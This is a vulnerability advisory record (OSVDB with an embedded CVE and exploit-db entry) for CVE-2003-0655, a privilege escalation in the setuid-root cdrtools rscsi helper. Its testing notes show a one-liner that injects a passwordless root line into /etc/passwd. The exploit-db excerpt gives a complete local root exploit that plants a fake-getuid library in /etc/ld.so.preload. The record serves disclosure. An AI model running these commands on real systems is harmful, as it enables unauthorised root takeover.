ID OSVDB:6406 Type osvdb Reporter KF(dotslash@snosoft.com) Modified 2003-08-01T00:00:00
Description
Vulnerability Description
cdrtools contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when a specially formatted string is passed to the rscsi program. This flaw may lead to a loss of integrity.
Solution Description
Upgrade to version 2.01a18 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.
Short Description
cdrtools contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when a specially formatted string is passed to the rscsi program. This flaw may lead to a loss of integrity.
Manual Testing Notes
elguapo@gentoo elguapo $ echo Cecho -e
"\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08r00t::0:0:root:/:/bin/bash\x0a" |
/opt/schily/sbin/rscsi /tmp/lala
Segmentation fault (this segfault is not related to the security issue)
elguapo@gentoo elguapo $ cat /tmp/lala
rscsid: user id 1000, name elguapo
rmt: stdin is a PIPE
r00t::0:0:root:/root:/bin/bash
When attempting to echo this line to the password file we get the following
error. Please note that the password file IS still overwritten at this point.
E0
Illegal user id for RSCSI server
0
elguapo@gentoo elguapo $ cat /etc/passwd
rscsid: Illegal user '(NULL POINTER)' id 1000 for RSCSI server
rscsid:>E 0 (Illegal user id for RSCSI server) []
References:
Vendor URL: http://www.fokus.fhg.de/research/cc/glone/employees/joerg.schilling/private/cdrecord.html
Security Tracker: 1007368
Mail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=105978381618095&w=2
Keyword: suid
ISS X-Force ID: 12802
CVE-2003-0655
Bugtraq ID: 8328
{"type": "osvdb", "published": "2003-08-01T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:6406", "bulletinFamily": "software", "cvss": {"vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 7.2}, "viewCount": 1, "edition": 1, "reporter": "KF(dotslash@snosoft.com)", "title": "cdrtools rscsi Privilege Escalation", "affectedSoftware": [{"operator": "eq", "version": "1.0x", "name": "cdrtools"}, {"operator": "eq", "version": "2.00.3", "name": "cdrtools"}, {"operator": "eq", "version": "2.00", "name": "cdrtools"}, {"operator": "eq", "version": "1.10", "name": "cdrtools"}], "enchantments": {"score": {"value": 6.7, "vector": "NONE", "modified": "2017-04-28T13:20:01", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2003-0655"]}, {"type": "exploitdb", "idList": ["EDB-ID:22979"]}, {"type": "osvdb", "idList": ["OSVDB:2359"]}], "modified": "2017-04-28T13:20:01", "rev": 2}, "vulnersScore": 6.7}, "references": [], "id": "OSVDB:6406", "lastseen": "2017-04-28T13:20:01", "cvelist": ["CVE-2003-0655"], "modified": "2003-08-01T00:00:00", "description": "## Vulnerability Description\ncdrtools contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when a specially formatted string is passed to the rscsi program. This flaw may lead to a loss of integrity.\n## Solution Description\nUpgrade to version 2.01a18 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\ncdrtools contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when a specially formatted string is passed to the rscsi program. This flaw may lead to a loss of integrity.\n## Manual Testing Notes\nelguapo@gentoo elguapo $ echo C`echo -e \n\"\\x08\\x08\\x08\\x08\\x08\\x08\\x08\\x08\\x08\\x08r00t::0:0:root:/:/bin/bash\\x0a\"` | \n/opt/schily/sbin/rscsi /tmp/lala\nSegmentation fault (this segfault is not related to the security issue)\n\nelguapo@gentoo elguapo $ cat /tmp/lala\nrscsid: user id 1000, name elguapo\nrmt: stdin is a PIPE\nr00t::0:0:root:/root:/bin/bash\n\nWhen attempting to echo this line to the password file we get the following \nerror. Please note that the password file IS still overwritten at this point. \n\nE0\nIllegal user id for RSCSI server\n0\n\nelguapo@gentoo elguapo $ cat /etc/passwd\nrscsid: Illegal user '(NULL POINTER)' id 1000 for RSCSI server\nrscsid:>E 0 (Illegal user id for RSCSI server) []\n## References:\nVendor URL: http://www.fokus.fhg.de/research/cc/glone/employees/joerg.schilling/private/cdrecord.html\nSecurity Tracker: 1007368\nMail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=105978381618095&w=2\nKeyword: suid\nISS X-Force ID: 12802\n[CVE-2003-0655](https://vulners.com/cve/CVE-2003-0655)\nBugtraq ID: 8328\n"}
{"cve": [{"lastseen": "2021-02-02T05:22:09", "description": "rscsi in cdrtools 2.01 and earlier allows local users to overwrite arbitrary files and gain root privileges by specifying the target file as a command line argument, which is modified while rscsi is running with privileges.", "edition": 4, "cvss3": {}, "published": "2003-08-27T04:00:00", "title": "CVE-2003-0655", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2003-0655"], "modified": "2016-10-18T02:36:00", "cpe": ["cpe:/a:cdrtools:cdrtools:2.0", "cpe:/a:cdrtools:cdrtools:2.0.3"], "id": "CVE-2003-0655", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0655", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:cdrtools:cdrtools:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:cdrtools:cdrtools:2.0.3:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:19:57", "bulletinFamily": "software", "cvelist": ["CVE-2003-0655"], "edition": 1, "description": "## Vulnerability Description\ncdrecord in cdrtools contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The problem is that the rscsi helper binary is installed setuid root. By specifying the target file as a command line argument, a malicious user could overwrite arbitrary files to gain root privileges resulting in a loss of integrity.\n## Solution Description\nUpgrade to version 2.01a18 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\ncdrecord in cdrtools contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The problem is that the rscsi helper binary is installed setuid root. By specifying the target file as a command line argument, a malicious user could overwrite arbitrary files to gain root privileges resulting in a loss of integrity.\n## References:\nVendor URL: http://www.fokus.gmd.de/research/cc/glone/employees/joerg.schilling/private/cdrecord.html\nSecurity Tracker: 1007368\n[Secunia Advisory ID:9428](https://secuniaresearch.flexerasoftware.com/advisories/9428/)\nOther Advisory URL: http://marc.theaimsgroup.com/?l=bugtraq&m=105978381618095&w=2\nISS X-Force ID: 12802\n[CVE-2003-0655](https://vulners.com/cve/CVE-2003-0655)\nBugtraq ID: 8328\n", "modified": "2003-08-01T23:04:23", "published": "2003-08-01T23:04:23", "href": "https://vulners.com/osvdb/OSVDB:2359", "id": "OSVDB:2359", "type": "osvdb", "title": "cdrtools cdrecord rscsi Arbitrary File Overwrite Privilege Escalation", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-02T19:59:06", "description": "CDRTools 2.0 RSCSI Debug File Arbitrary Local File Manipulation Vulnerability. CVE-2003-0655. Local exploit for linux platform", "published": "2003-08-01T00:00:00", "type": "exploitdb", "title": "CDRTools 2.0 RSCSI Debug File Arbitrary Local File Manipulation Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2003-0655"], "modified": "2003-08-01T00:00:00", "id": "EDB-ID:22979", "href": "https://www.exploit-db.com/exploits/22979/", "sourceData": "source: http://www.securityfocus.com/bid/8328/info\r\n\r\nIt has been reported that the rscsi utility may provide for the modification of ownership and the corruption of arbitrary attacker specified files. \r\n\r\nIt has been reported that a local attacker may invoke the rscsi utility to corrupt or seize group ownership of an attacker specified file. Because the rscsi utility is installed with setuid 'root' permissions by default, a local attacker may harness this vulnerability to achieve elevated privileges.\r\n\r\n$ echo C`echo -e \r\n\"\\x08\\x08\\x08\\x08\\x08\\x08\\x08\\x08\\x08\\x08r00t::0:0:root:/:/bin/bash\\x0a\"` | \r\n/opt/schily/sbin/rscsi /tmp/lala\r\n\r\n\r\n[kf@vegeta kf]$ ls -al /etc/ld.so.preload\r\nls: /etc/ld.so.preload: No such file or directory\r\n[kf@vegeta kf]$ cat > oops.c\r\nint getuid(void)\r\n{\r\nreturn(0);\r\n}\r\n[kf@vegeta kf]$ gcc -c -o oops.o oops.c\r\n[kf@vegeta kf]$ ld -shared -o oops.so oops.o\r\n[kf@vegeta kf]$ ls -al oops.so\r\n-rwxrwxr-x 1 kf kf 1714 Jul 30 18:53 oops.so\r\n[kf@vegeta kf]$ echo duh_kf | /opt/schily/sbin/rscsi /etc/ld.so.preload\r\nE0\r\nGarbage command\r\n0\r\n-rw-rw-r-- 1 root kf 1 Jul 30 19:29 /etc/ld.so.preload\r\n[kf@vegeta kf]$ echo /home/kf/oops.so > /etc/ld.so.preload\r\n[kf@vegeta kf]$ su\r\n[root@vegeta kf]# rm /etc/ld.so.preload\r\nrm: remove regular file `/etc/ld.so.preload'? y\r\n[root@vegeta kf]# id\r\nuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/22979/"}]}
